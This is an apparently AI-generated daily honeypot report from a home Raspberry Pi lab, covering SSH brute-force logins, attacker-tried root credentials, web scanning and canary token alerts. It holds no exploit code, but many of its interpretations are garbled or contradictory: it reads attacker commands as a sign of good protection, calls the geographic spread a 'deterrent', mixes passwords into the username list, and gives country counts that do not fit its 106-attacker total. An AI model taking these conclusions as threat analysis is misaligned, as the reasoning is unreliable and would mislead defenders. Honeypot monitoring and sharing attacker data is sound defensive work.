Wednesday, 13 May 2026 💀 critical 🤖 qwen2.5:1.5b

Honeypot Threat Analysis — May 13, 2026

Critical threat level — massive coordinated attack activity across all honeypot services.

🌍 106 unique attackers ⚡ 1,925 events 📊 View raw data report →
ssh-brute-forcehoneypotweb-scanningmulti-protocolhigh-severitythreat-intelligence

Threat Landscape Overview

Today’s activity level is high across all three honeypots. The SSH honeypot received over 800 connections and over 600 login attempts, indicating a significant number of persistent attackers. This combined with 104 commands executed suggests that the targets are resilient but well-protected. The multi-protocol honeypot saw an increase in events triggered by various protocols, showing diverse attacker techniques.

Geographic Analysis

The top countries from which attacks originate are as follows:

  • United States: 139 (25%)
  • Belgium: 70 (12%)
  • France: 47 (8%)
  • Unknown: 35 (6%)
  • Netherlands: 28 (5%)
  • Germany: 27 (4%)
  • China: 26 (4%)
  • Finland: 21 (3%)
  • United Kingdom: 17 (3%)
  • India: 10 (1%)

This geographical distribution suggests that the honeypot is serving as a deterrent for multiple regions, indicating a global threat landscape.

SSH Brute Force Analysis

Attacks were predominantly brute force attempts with many successful logins. The attackers tried common passwords and root access credentials:

  • Root user: admin, ankurkudintzi, fuckyou
  • Passwords: 123456, 123, solana, qwer1234

The post-authentication commands reveal a mix of system information gathering and miner-related activities. The presence of a TTY session indicates some malicious intent during the login process.

Post-Exploitation Behavior

Successful logins by attackers include:

root:admin
root:ankurkudintzi
root:---fuck_you----
root:fuckyou
root:fuckoff
root:!@#$%^
root:nginx
root:------fuck------
root:ubuntu

These sessions suggest a targeted and persistent approach, possibly looking for sensitive information or mining resources.

Web Scanner Activity

The HTTP LLM honeypot received 71 requests from various IPs, indicating that the targets are using web scanners to identify open ports. This activity is common in cybersecurity training environments, where attackers practice their scanning skills.

Malware Captures

No malware samples were downloaded by any of the attackers during today’s activity. The absence of malware captures suggests a focused approach on avoiding detection through legitimate means rather than exploiting vulnerabilities directly.

SSH Tarpit (Endlessh)

There was no data indicating that the tarpit was active, suggesting that the honeypot is not being actively exploited by persistent attackers looking for long-term access.

Canarytoken Alerts

The honeypot received 24 canary token triggers from various AWS keys and SSH key pairs. These alerts highlight how attackers are using planted credentials to test their effectiveness in exploiting misconfigurations or misdirected security policies.

Community Defense

All reported IPs have been shared with AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield for ongoing investigation. No malicious hashes were identified from any of the captures.

This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.

🤖

This analysis was generated by qwen2.5:1.5b running locally on the same Raspberry Pi 5 that operates the honeypots. No data leaves the device. All threat data is sourced from real attacks captured in the last 24 hours.

← All analyses 📊 Data report →